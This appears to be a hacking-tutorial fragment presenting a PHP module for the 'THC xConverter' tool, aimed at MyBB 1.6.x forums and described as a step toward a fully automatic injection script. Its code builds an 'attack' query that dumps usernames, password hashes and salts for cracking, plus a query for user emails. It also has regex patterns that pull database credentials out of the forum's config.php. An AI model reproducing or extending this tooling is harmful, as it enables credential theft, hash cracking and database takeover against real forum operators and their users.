..something cool, we will make a new module and not just some new module, nope let's make a fully automatic injection script! This tutorial is the first step into making this. Let's first..
THC xConverter is a tool that makes use of (php) functions in order to calculate, fetch, convert and encrypt data
<?php
/* MyBB */
$_PROPERTIES = array();
$_PROPERTIES['name'] = "MyBB";
$_PROPERTIES['version'] = "1.6.x";
$_PROPERTIES['usernamefield'] = "username";
$_PROPERTIES['emailfield'] = "email";
$_PROPERTIES['hashfield'] = "password";
$_PROPERTIES['saltfield'] = "salt";
$_PROPERTIES['tablename'] = "users";
$_PROPERTIES['tableprefix'] = "mybb_";
$_PROPERTIES['filename'] = "mybb/mybba.php";
// use post variables instead if values are different from default
if(isset($_POST['iUseDefault']) && $_POST['iUseDefault']==0){
$_PROPERTIES['usernamefield'] = @mysql_real_escape_string($_POST['sUserNameField']);
$_PROPERTIES['emailfield'] = @mysql_real_escape_string($_POST['sEmailField']);
$_PROPERTIES['hashfield'] = @mysql_real_escape_string($_POST['sHashField']);
$_PROPERTIES['tablename'] = @mysql_real_escape_string($_POST['sTableName']);
$_PROPERTIES['tableprefix'] = @mysql_real_escape_string($_POST['sTablePrefix']);
}
$_PROPERTIES['queryraw'] = array();
$_PROPERTIES['queryraw']['attack'] = "SELECT ".$_PROPERTIES['usernamefield']." AS crackuser,".$_PROPERTIES['hashfield']." AS crackpass".(isset($_PROPERTIES['saltfield']) ? ",".$_PROPERTIES['saltfield']." AS crackhash" : "")." FROM ".$_PROPERTIES['tableprefix'].$_PROPERTIES['tablename'];
$_PROPERTIES['queryraw']['getemail'] = "SELECT ".$_PROPERTIES['emailfield']." AS temail FROM ".$_PROPERTIES['tableprefix'].$_PROPERTIES['tablename']." WHERE ".$_PROPERTIES['usernamefield']."='/user/'";
if(isset($_GET['JSON'])){
session_cache_limiter('nocache');
header('Expires: '.gmdate('r',0));
header('Content-type: application/json');
echo json_encode($_PROPERTIES);
}
$_SYSTEM = array();
$_SYSTEM['name'] = $_PROPERTIES['name'];
$_SYSTEM['version'] = $_PROPERTIES['version'];
$_SYSTEM['patterns'] = array();
$_SYSTEM['patterns']['user'] = '/\$config\[\'database\'\]\[\'username\'\]\s+=\s+\'(.*)?\'/';
$_SYSTEM['patterns']['password'] = '/\$config\[\'database\'\]\[\'password\'\]\s+=\s+\'(.*)?\'/';
$_SYSTEM['patterns']['host'] = '/\$config\[\'database\'\]\[\'hostname\'\]\s+=\s+\'(.*)?\'/';
$_SYSTEM['patterns']['database'] = '/\$config\[\'database\'\]\[\'database\'\]\s+=\s+\'(.*)?\'/';
$_SYSTEM['file'] = "/inc/config.php";
?>